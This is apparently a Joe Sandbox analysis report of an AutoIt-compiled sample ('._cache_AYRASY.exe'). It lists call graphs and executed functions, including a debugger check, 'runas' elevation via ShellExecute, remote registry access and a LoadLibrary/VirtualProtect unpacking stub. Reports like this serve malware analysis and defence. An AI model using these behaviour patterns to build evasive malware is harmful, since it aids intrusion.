1e1eed 104038 18e975 104033->104038 104035 1e1f01 104054 191b2a 52 API calls __cinit 104035->104054 104037 1e1f0b 104039 19010a 48 API calls 104038->104039 104040 18ea27 GetModuleFileNameW 104039->104040 104041 19297d __wsplitpath 47 API calls 104040->104041 104042 18ea5b _wcsncat 104041->104042 104055 192bff 104042->104055 104045 19010a 48 API calls 104046 18ea94 _wcscpy 104045->104046 104047 17d3d2 48 API calls 104046->104047 104048 18eacf 104047->104048 104058 18eb05 104048->104058 104050 18eae0 Mailbox 104050->104035 104051 17a4f6 48 API calls 104053 18eada _wcscat __wsetenvp _wcsncpy 104051->104053 104052 19010a 48 API calls 104052->104053 104053->104050 104053->104051 104053->104052 104054->104037 104072 19aab9 104055->104072 104059 17c4cd 48 API calls 104058->104059 104060 18eb14 RegOpenKeyExW 104059->104060 104061 1e4b17 RegQueryValueExW 104060->104061 104062 18eb35 104060->104062 104063 1e4b30 104061->104063 104064 1e4b91 RegCloseKey 104061->104064 104062->104053 104065 19010a 48 API calls 104063->104065 104066 1e4b49 104065->104066 104067 174bce 48 API calls 104066->104067 104068 1e4b53 RegQueryValueExW 104067->104068 104069 1e4b6f 104068->104069 104070 1e4b86 104068->104070 104071 177e53 48 API calls 104069->104071 104070->104064 104071->104070 104073 19aaca 104072->104073 104074 19abc6 104072->104074 104073->104074 104080 19aad5 104073->104080 104082 19889e 47 API calls __getptd_noexit 104074->104082 104078 18ea8a 104078->104045 104079 19abbb 104083 197aa0 8 API calls __wsopen_helper 104079->104083 104080->104078 104081 19889e 47 API calls __getptd_noexit 104080->104081 104081->104079 104082->104079 104083->104078 104084 1e1eca 104089 18be17 104084->104089 104088 1e1ed9 104090 17d3d2 48 API calls 104089->104090 104091 18be85 104090->104091 104098 18c929 104091->104098 104093 1edb92 104095 18bf22 104095->104093 104096 18bf3e 104095->104096 104101 18c8b7 48 API calls _memmove 104095->104101 104097 191b2a 52 API calls __cinit 104096->104097 104097->104088 104102 18c955 104098->104102 104101->104095 104103 18c948 104102->104103 104104 18c962 104102->104104 104103->104095 104104->104103 104105 18c969 RegOpenKeyExW 104104->104105 104105->104103 104106 18c983 RegQueryValueExW 104105->104106 104107 18c9b9 RegCloseKey 104106->104107 104108 18c9a4 104106->104108 104107->104103 104108->104107 104109 1e1e8b 104114 18e44f 104109->104114 104113 1e1e9a 104115 19010a 48 API calls 104114->104115 104116 18e457 104115->104116 104117 18e46b 104116->104117 104122 18e74b 104116->104122 104121 191b2a 52 API calls __cinit 104117->104121 104121->104113 104123 18e754 104122->104123 104124 18e463 104122->104124 104154 191b2a 52 API calls __cinit 104123->104154 104126 18e47b 104124->104126 104127 17d3d2 48 API calls 104126->104127 104128 18e492 GetVersionExW 104127->104128 104129 177e53 48 API calls 104128->104129 104130 18e4d5 104129->104130 104155 18e5f8 104130->104155 104133 18e617 48 API calls 104136 18e4e9 104133->104136 104135 1e29f9 104136->104135 104159 18e6d1 104136->104159 104138 18e55f GetCurrentProcess 104168 18e70e LoadLibraryA GetProcAddress 104138->104168 104139 18e576 104140 18e5ec GetSystemInfo 104139->104140 104141 18e59e 104139->104141 104144 18e5c9 104140->104144 104162 18e694 104141->104162 104146 18e5dc 104144->104146 104147 18e5d7 FreeLibrary 104144->104147 104146->104117 104147->104146 104148 18e5e4 GetSystemInfo 104151 18e5be 104148->104151 104149 18e5b4 104165 18e437 104149->104165 104151->104144 104153 18e5c4 FreeLibrary 104151->104153 104153->104144 104154->104124 104156 18e601 104155->104156 104157 17a2fb 48 API calls 104156->104157 104158 18e4dd 104157->104158 104158->104133 104169 18e6e3 104159->104169 104173 18e6a6 104162->104173 104166 18e694 2 API calls 104165->104166 104167 18e43f GetNativeSystemInfo 104166->104167 104167->104151 104168->104139 104170 18e55b 104169->104170 104171 18e6ec LoadLibraryA 104169->104171 104170->104138 104170->104139 104171->104170 104172 18e6fd GetProcAddress 104171->104172 104172->104170 104174 18e5ac 104173->104174 104175 18e6af LoadLibraryA 104173->104175 104174->104148 104174->104149 104175->104174 104176 18e6c0 GetProcAddress 104175->104176 104176->104174 104177 1729c2 104178 1729cb 104177->104178 104179 1729e9 104178->104179 104180 172a48 104178->104180 104218 172a46 104178->104218 104184 1729f6 104179->104184 104185 172aac PostQuitMessage 104179->104185 104182 1e2307 104180->104182 104183 172a4e 104180->104183 104181 172a2b NtdllDefWindowProc_W 104211 172a39 104181->104211 104232 17322e 16 API calls 104182->104232 104186 172a76 SetTimer RegisterClipboardFormatW 104183->104186 104187 172a53 104183->104187 104189 1e238f 104184->104189 104190 172a01 104184->104190 104185->104211 104194 172a9f CreatePopupMenu 104186->104194 104186->104211 104191 1e22aa 104187->104191 104192 172a5a KillTimer 104187->104192 104238 1b57fb 60 API calls _memset 104189->104238 104195 172ab6 104190->104195 104196 172a09 104190->104196 104202 1e22af 104191->104202 104203 1e22e3 MoveWindow 104191->104203 104229 172b94 Shell_NotifyIconW _memset 104192->104229 104193 1e232e 104233 18ec33 417 API calls Mailbox 104193->104233 104194->104211 104222 171e58 104195->104222 104200 172a14 104196->104200 104207 1e2374 104196->104207 104208 172a1f 104200->104208 104209 1e235f 104200->104209 104204 1e22d2 SetFocus 104202->104204 104205 1e22b3 104202->104205 104203->104211 104204->104211 104205->104208 104212 1e22bc 104205->104212 104206 172a6d 104230 172ac7 DeleteObject DestroyWindow Mailbox 104206->104230 104207->104181 104237 1ab31f 48 API calls 104207->104237 104208->104181 104234 172b94 Shell_NotifyIconW _memset 104208->104234 104236 1b5fdb 70 API calls _memset 104209->104236 104210 1e23a1 104210->104181 104210->104211 104231 17322e 16 API calls 104212->104231 104217 1e236f 104217->104211 104218->104181 104220 1e2353 104235 173598 67 API calls _memset 104220->104235 104223 171ef1 104222->104223 104224 171e6f _memset 104222->104224 104223->104211 104239 1738e4 104224->104239 104226 171eda KillTimer SetTimer 104226->104223 104227 171e96 104227->104226 104228 1e4518 Shell_NotifyIconW 104227->104228 104228->104226 104229->104206 104230->104211 104231->104211 104232->104193 104233->104208 104234->104220 104235->104218 104236->104217 104237->104218 104238->104210 104240 1739d5 Mailbox 104239->104240 104241 173900 104239->104241 104240->104227 104242 177b6e 48 API calls 104241->104242 104243 17390e 104242->104243 104244 1e453f LoadStringW 104243->104244 104245 17391b 104243->104245 104247 1e4559 104244->104247 104246 177e53 48 API calls 104245->104246 104248 173930 104246->104248 104262 1739e8 48 API calls 2 library calls 104247->104262 104248->104247 104250 173941 104248->104250 104251 17394b 104250->104251 104252 1739da 104250->104252 104261 1739e8 48 API calls 2 library calls 104251->104261 104255 17c935 48 API calls 104252->104255 104253 1e4564 104256 1e4578 104253->104256 104259 173956 _memset _wcscpy 104253->104259 104255->104259 104263 1739e8 48 API calls 2 library calls 104256->104263 104258 1e4586 104260 1739ba Shell_NotifyIconW 104259->104260 104260->104240 104261->104259 104262->104253 104263->104258 104264 1ec146 GetUserNameW 104265 196a80 104266 196a8c __wsopen_helper 104265->104266 104302 198b7b GetStartupInfoW 104266->104302 104268 196a91 104304 19a937 GetProcessHeap 104268->104304 104270 196ae9 104271 196af4 104270->104271 104386 196bd0 47 API calls 3 library calls 104270->104386 104305 1987d7 104271->104305 104274 196afa 104275 196b05 __RTC_Initialize 104274->104275 104387 196bd0 47 API calls 3 library calls 104274->104387 104326 19ba66 104275->104326 104278 196b14 104279 196b20 GetCommandLineW 104278->104279 104388 196bd0 47 API calls 3 library calls 104278->104388 104345 1a3c2d GetEnvironmentStringsW 104279->104345 104282 196b1f 104282->104279 104285 196b3a 104286 196b45 104285->104286 104389 191d7b 47 API calls 3 library calls 104285->104389 104355 1a3a64 104286->104355 104290 196b56 104369 191db5 104290->104369 104293 196b5e 104303 198b91 104302->104303 104303->104268 104304->104270 104394 191e5a 30 API calls 2 library calls 104305->104394 104307 1987dc 104395 198ab3 InitializeCriticalSectionAndSpinCount 104307->104395 104309 1987e1 104310 1987e5 104309->104310 104397 198afd TlsAlloc 104309->104397 104396 19884d 50 API calls 2 library calls 104310->104396 104313 1987ea 104313->104274 104314 1987f7 104314->104310 104315 198802 104314->104315 104398 197616 104315->104398 104318 198844 104406 19884d 50 API calls 2 library calls 104318->104406 104321 198823 104321->104318 104323 198829 104321->104323 104322 198849 104322->104274 104405 198724 47 API calls 4 library calls 104323->104405 104325 198831 GetCurrentThreadId 104325->104274 104327 19ba72 __wsopen_helper 104326->104327 104415 198984 104327->104415 104329 19ba79 104330 197616 __calloc_crt 47 API calls 104329->104330 104332 19ba8a 104330->104332 104331 19baf5 GetStartupInfoW 104334 19bb0a 104331->104334 104335 19bc33 104331->104335 104332->104331 104333 19ba95 __wsopen_helper @_EH4_CallFilterFunc@8 104332->104333 104333->104278 104334->104335 104339 197616 __calloc_crt 47 API calls 104334->104339 104341 19bb58 104334->104341 104336 19bcf7 104335->104336 104338 19bc7c GetStdHandle 104335->104338 104340 19bc8e GetFileType 104335->104340 104342 19bcbb InitializeCriticalSectionAndSpinCount 104335->104342 104422 19bd0b RtlLeaveCriticalSection _doexit 104336->104422 104338->104335 104339->104334 104340->104335 104341->104335 104343 19bb98 InitializeCriticalSectionAndSpinCount 104341->104343 104344 19bb8a GetFileType 104341->104344 104342->104335 104343->104341 104344->104341 104344->104343 104346 196b30 104345->104346 104347 1a3c3e 104345->104347 104351 1a382b GetModuleFileNameW 104346->104351 104348 197660 __malloc_crt 47 API calls 104347->104348 104349 1a3c64 _memmove 104348->104349 104350 1a3c7a FreeEnvironmentStringsW 104349->104350 104350->104346 104352 1a385f _wparse_cmdline 104351->104352 104353 197660 __malloc_crt 47 API calls 104352->104353 104354 1a389f _wparse_cmdline 104352->104354 104353->104354 104354->104285 104356 1a3a7d __wsetenvp 104355->104356 104357 196b4b 104355->104357 104358 197616 __calloc_crt 47 API calls 104356->104358 104357->104290 104390 191d7b 47 API calls 3 library calls 104357->104390 104363 1a3aa6 __wsetenvp 104358->104363 104359 1a3afd 104360 1928ca _free 47 API calls 104359->104360 104360->104357 104361 197616 __calloc_crt 47 API calls 104361->104363 104362 1a3b22 104364 1928ca _free 47 API calls 104362->104364 104363->104357 104363->104359 104363->104361 104363->104362 104366 1a3b39 104363->104366 104465 1a3317 47 API calls __wsopen_helper 104363->104465 104364->104357 104466 197ab0 IsProcessorFeaturePresent 104366->104466 104370 191dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 104369->104370 104372 191e00 __IsNonwritableInCurrentImage 104370->104372 104489 191b2a 52 API calls __cinit 104370->104489 104372->104293 104386->104271 104387->104275 104388->104282 104394->104307 104395->104309 104396->104313 104397->104314 104401 19761d 104398->104401 104400 19765a 104400->104318 104404 198b59 TlsSetValue 104400->104404 104401->104400 104402 19763b Sleep 104401->104402 104407 1a3e5a 104401->104407 104403 197652 104402->104403 104403->104400 104403->104401 104404->104321 104405->104325 104406->104322 104408 1a3e65 104407->104408 104412 1a3e80 __calloc_impl 104407->104412 104409 1a3e71 104408->104409 104408->104412 104414 19889e 47 API calls __getptd_noexit 104409->104414 104410 1a3e90 RtlAllocateHeap 104410->104412 104413 1a3e76 104410->104413 104412->104410 104412->104413 104413->104401 104414->104413 104416 1989a8 RtlEnterCriticalSection 104415->104416 104417 198995 104415->104417 104416->104329 104423 198a0c 104417->104423 104419 19899b 104419->104416 104446 191d7b 47 API calls 3 library calls 104419->104446 104422->104333 104424 198a18 __wsopen_helper 104423->104424 104425 198a39 104424->104425 104426 198a21 104424->104426 104432 198a59 __wsopen_helper 104425->104432 104450 197660 104425->104450 104447 198e52 47 API calls 2 library calls 104426->104447 104429 198a26 104448 198eb2 47 API calls 8 library calls 104429->104448 104432->104419 104433 198a63 104438 198984 __lock 46 API calls 104433->104438 104434 198a54 104456 19889e 47 API calls __getptd_noexit 104434->104456 104435 198a2d 104449 191d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104435->104449 104440 198a6a 104438->104440 104441 198a79 InitializeCriticalSectionAndSpinCount 104440->104441 104442 198a8e 104440->104442 104443 198a94 104441->104443 104457 1928ca 104442->104457 104463 198aaa RtlLeaveCriticalSection _doexit 104443->104463 104447->104429 104448->104435 104451 19766e 104450->104451 104452 1945ec __crtLCMapStringA_stat 46 API calls 104451->104452 104453 1976a2 104451->104453 104454 197681 Sleep 104451->104454 104452->104451 104453->104433 104453->104434 104455 19769a 104454->104455 104455->104451 104455->104453 104456->104432 104458 1928fc _free 104457->104458 104459 1928d3 RtlFreeHeap 104457->104459 104458->104443 104459->104458 104460 1928e8 104459->104460 104464 19889e 47 API calls __getptd_noexit 104460->104464 104462 1928ee GetLastError 104462->104458 104463->104432 104464->104462 104465->104363 104467 197abb 104466->104467 104489->104372 105304 1ebc25 105305 1ebc27 105304->105305 105308 1b79f8 SHGetFolderPathW 105305->105308 105309 177e53 48 API calls 105308->105309 105310 1b7a25 105309->105310 105311 17e849 105314 1826c0 105311->105314 105313 17e852 105315 1e862d 105314->105315 105316 18273b 105314->105316 105436 1bd520 86 API calls 4 library calls 105315->105436 105318 182adc 105316->105318 105319 18277c 105316->105319 105328 18279a 105316->105328 105435 17d349 53 API calls 105318->105435 105358 1828f6 105319->105358 105431 17d500 53 API calls __cinit 105319->105431 105320 1e863e 105437 1bd520 86 API calls 4 library calls 105320->105437 105321 1827cf 105321->105320 105324 1827db 105321->105324 105322 182a84 105331 17d380 55 API calls 105322->105331 105326 1827ef 105324->105326 105336 1e865a 105324->105336 105329 1e86c9 105326->105329 105330 182806 105326->105330 105328->105321 105328->105322 105347 182914 105328->105347 105334 1e8ac9 105329->105334 105335 17fa40 417 API calls 105329->105335 105332 17fa40 417 API calls 105330->105332 105333 182aab 105331->105333 105370 18281d 105332->105370 105338 17d2d2 53 API calls 105333->105338 105452 1bd520 86 API calls 4 library calls 105334->105452 105339 1e86ee 105335->105339 105336->105329 105353 1829ec 105336->105353 105438 1cf211 417 API calls 105336->105438 105439 1cf4df 417 API calls 105336->105439 105338->105347 105343 17d89e 50 API calls 105339->105343 105351 1e870a 105339->105351 105339->105353 105341 1e8980 105447 1bd520 86 API calls 4 library calls 105341->105447 105342 182836 105342->105334 105348 17fa40 417 API calls 105342->105348 105343->105351 105344 17cdb4 48 API calls 105354 18296e 105344->105354 105347->105344 105372 18287c 105348->105372 105349 17c935 48 API calls 105349->105342 105350 1828cc 105350->105358 105432 17cf97 58 API calls 105350->105432 105357 1e878d 105351->105357 105440 17346e 48 API calls 105351->105440 105353->105313 105354->105353 105362 182984 105354->105362 105367 1e8a97 105354->105367 105375 1e89b4 105354->105375 105355 1828ac 105355->105350 105445 17cf97 58 API calls 105355->105445 105356 1e883f 105443 1cc235 417 API calls Mailbox 105356->105443 105357->105356 105361 1e882d 105357->105361 105441 1b4e71 53 API calls __cinit 105357->105441 105366 182900 105358->105366 105446 17cf97 58 API calls 105358->105446 105368 17ca8e 48 API calls 105361->105368 105362->105367 105433 1841fc 84 API calls 105362->105433 105364 1e8888 105369 1e888c 105364->105369 105364->105370 105366->105341 105366->105347 105367->105353 105451 174b02 50 API calls 105367->105451 105368->105356 105444 1bd520 86 API calls 4 library calls 105369->105444 105370->105342 105370->105349 105370->105353 105372->105353 105372->105355 105378 17fa40 417 API calls 105372->105378 105417 1cbf80 105375->105417 105377 1829b8 105379 1e8a7e 105377->105379 105434 1841fc 84 API calls 105377->105434 105385 1e88ff 105378->105385 105450 18ee93 84 API calls 105379->105450 105380 1e8725 105380->105361 105393 1814a0 48 API calls 105380->105393 105382 1e8813 105390 17d89e 50 API calls 105382->105390 105383 1e87ca 105383->105382 105388 1784a6 81 API calls 105383->105388 105385->105353 105391 17d89e 50 API calls 105385->105391 105387 1e89f3 105398 1e8a42 105387->105398 105399 1e8a01 105387->105399 105405 1e87e0 105388->105405 105389 1829ca 105389->105353 105394 1e8a6f 105389->105394 105395 1829e5 105389->105395 105392 1e8821 105390->105392 105391->105355 105396 17d89e 50 API calls 105392->105396 105397 1e875d 105393->105397 105449 1cd1da 50 API calls 105394->105449 105402 19010a 48 API calls 105395->105402 105396->105361 105397->105361 105406 1814a0 48 API calls 105397->105406 105400 17d89e 50 API calls 105398->105400 105403 17ca8e 48 API calls 105399->105403 105404 1e8a4b 105400->105404 105402->105353 105403->105353 105407 17d89e 50 API calls 105404->105407 105405->105382 105442 1ba76d 49 API calls 105405->105442 105409 1e8775 105406->105409 105410 1e8a57 105407->105410 105412 17d89e 50 API calls 105409->105412 105448 174b02 50 API calls 105410->105448 105411 1e8807 105414 17d89e 50 API calls 105411->105414 105415 1e8781 105412->105415 105414->105382 105416 17d89e 50 API calls 105415->105416 105416->105357 105420 1cbfd9 _memset 105417->105420 105419 1cc22e 105419->105387 105421 1cc14c 105420->105421 105422 1cc033 105420->105422 105425 1cc097 VariantInit 105420->105425 105421->105422 105423 1cc19f VariantInit VariantClear 105421->105423 105455 1cc235 417 API calls Mailbox 105422->105455 105424 1cc1c5 105423->105424 105424->105422 105426 1cc1e6 105424->105426 105429 1cc0d6 105425->105429 105454 1ba6f6 103 API calls 105426->105454 105428 1cc20d VariantClear 105428->105419 105429->105422 105453 1ba6f6 103 API calls 105429->105453 105431->105328 105432->105358 105433->105377 105434->105389 105435->105355 105436->105320 105437->105336 105438->105336 105439->105336 105440->105380 105441->105383 105442->105411 105443->105364 105444->105353 105445->105350 105446->105366 105447->105353 105448->105353 105449->105379 105450->105367 105451->105334 105452->105353 105453->105421 105454->105428 105455->105419 105456 2e20d0 105457 2e20e0 105456->105457 105458 2e21fa LoadLibraryA 105457->105458 105462 2e223f VirtualProtect VirtualProtect 105457->105462 105459 2e2211 105458->105459 105459->105457 105461 2e2223 GetProcAddress 105459->105461 105461->105459 105464 2e2239 ExitProcess 105461->105464 105463 2e22a4 105462->105463 105463->105463

                                                                                                                              Executed Functions

                                                                                                                              Function 0017374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0017376D
                                                                                                                                • Part of subcall function 00174257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00000000,00000001,00000000), ref: 0017428C
                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?), ref: 0017377F
                                                                                                                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00231120,C:\Users\user\Desktop\._cache_AYRASY.exe,00231124,?,?), ref: 001737EE
                                                                                                                                • Part of subcall function 001734F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0017352A
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00173860
                                                                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00222934,00000010), ref: 001E21C5
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?), ref: 001E21FD
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 001E2232
                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0020DAA4), ref: 001E2290
                                                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 001E2297
                                                                                                                                • Part of subcall function 001730A5: GetSysColorBrush.USER32(0000000F), ref: 001730B0
                                                                                                                                • Part of subcall function 001730A5: LoadCursorW.USER32(00000000,00007F00), ref: 001730BF
                                                                                                                                • Part of subcall function 001730A5: LoadIconW.USER32(00000063), ref: 001730D5
                                                                                                                                • Part of subcall function 001730A5: LoadIconW.USER32(000000A4), ref: 001730E7
                                                                                                                                • Part of subcall function 001730A5: LoadIconW.USER32(000000A2), ref: 001730F9
                                                                                                                                • Part of subcall function 001730A5: RegisterClassExW.USER32(?), ref: 00173167
                                                                                                                                • Part of subcall function 00172E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00172ECB
                                                                                                                                • Part of subcall function 00172E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00172EEC
                                                                                                                                • Part of subcall function 00172E9D: ShowWindow.USER32(00000000), ref: 00172F00
                                                                                                                                • Part of subcall function 00172E9D: ShowWindow.USER32(00000000), ref: 00172F09
                                                                                                                                • Part of subcall function 00173598: _memset.LIBCMT ref: 001735BE
                                                                                                                                • Part of subcall function 00173598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00173667
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                              • String ID: C:\Users\user\Desktop\._cache_AYRASY.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"#
                                                                                                                              • API String ID: 4253510256-292187363
                                                                                                                              • Opcode ID: ef8e86e1135d595b3fbf0ca2af00cbc546e0f34b2d445475e741ac88f69c3f2a
                                                                                                                              • Instruction ID: 504c646d4c341334c6995a1cfe693d48a161001d2ff9b8f262cee748cc23316a
                                                                                                                              • Opcode Fuzzy Hash: ef8e86e1135d595b3fbf0ca2af00cbc546e0f34b2d445475e741ac88f69c3f2a
                                                                                                                              • Instruction Fuzzy Hash: AA515AB0644284FBCB04ABB0FC4AFFD7B799B26700F108155FB9D92191D7704A95EB62
                                                                                                                              Function 001D30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D317F
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 001D321E
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001D32B6
                                                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 001D34F5
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 001D3502
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1240663315-0
                                                                                                                              • Opcode ID: 18034a19fb3f5c2a23bf2631d8d41b1d29520248e5c00846c690dfbc032d2898
                                                                                                                              • Instruction ID: 4287db88f2e2500d29169e6d71218b96475e8a65d9dc09b004aaa11298efc1b7
                                                                                                                              • Opcode Fuzzy Hash: 18034a19fb3f5c2a23bf2631d8d41b1d29520248e5c00846c690dfbc032d2898
                                                                                                                              • Instruction Fuzzy Hash: 4AE14A71204201AFCB15DF28C995E6ABBF9EF88314F04856DF45ADB2A1DB31EA41CB52
                                                                                                                              Function 001729C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00172A33
                                                                                                                              • KillTimer.USER32(?,00000001), ref: 00172A5D
                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00172A80
                                                                                                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00172A8B
                                                                                                                              • CreatePopupMenu.USER32 ref: 00172A9F
                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00172AAE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                              • String ID: TaskbarCreated
                                                                                                                              • API String ID: 157504867-2362178303
                                                                                                                              • Opcode ID: 46dd93fed49a72190cc8f0f5c6422554ac217446f3b65254584e6653748cae81
                                                                                                                              • Instruction ID: cb210fa72d37c5abb3f92336f6955baa49dfde5f65e812e9a4a206e2d95c98fe
                                                                                                                              • Opcode Fuzzy Hash: 46dd93fed49a72190cc8f0f5c6422554ac217446f3b65254584e6653748cae81
                                                                                                                              • Instruction Fuzzy Hash: 1B414931214746ABDB386F68BC0DBBD36BAF729300F048115F90AD7991DB708CA2D765
                                                                                                                              Function 0018E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetVersionExW.KERNEL32(?,00000000), ref: 0018E4A7
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,0020DC28,?,?), ref: 0018E567
                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,0020DC28,?,?), ref: 0018E5BC
                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0018E5C7
                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0018E5DA
                                                                                                                              • GetSystemInfo.KERNEL32(?,0020DC28,?,?), ref: 0018E5E4
                                                                                                                              • GetSystemInfo.KERNEL32(?,0020DC28,?,?), ref: 0018E5F0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
